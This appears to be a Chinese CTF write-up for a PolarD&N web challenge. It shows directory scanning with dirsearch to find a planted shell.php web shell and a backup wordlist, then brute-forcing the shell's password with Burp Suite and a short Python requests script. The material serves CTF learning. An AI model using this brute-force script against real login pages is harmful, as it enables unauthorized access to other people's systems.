PolarD&N_CTF_WEB_被黑掉的站

题目地址PolarD&N_CTF官方靶场

BP爆破

1.首先进网站看一下i

提示说现在站中还有很多马

我们用kali中dirsearch来扫描一下本站目录

dirsearch -u url -e .php

可以看出现在站中有一个bak备份文件和一个shell.php的木马

先访问一下shell.php

是一个登录网页

随便输入密码,打开bp抓包看一下

传递了一个参数pass

再打开备份文件看一下

好像是一个密码字典,

使用bp爆破一下试试

攻击后得到flag

python爆破

# -*- coding: utf-8 -*-
import requests
import re

url = "http://3a64e7b0-36a0-438c-b787-e85769cf434d.www.polarctf.com:8090/shell.php"
f = open('index.php.bak')#字典位置
payload = f.readlines()#读取字典内容

for i in payload:

    i = i.strip();#去除换行符

    data = {'pass':i}

    response = requests.post(url=url,data=data)

    if 'flag' in response.text:

        print(data)

        print(re.findall(r'flag{.*?}',response.text)[0])
python pass.py

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值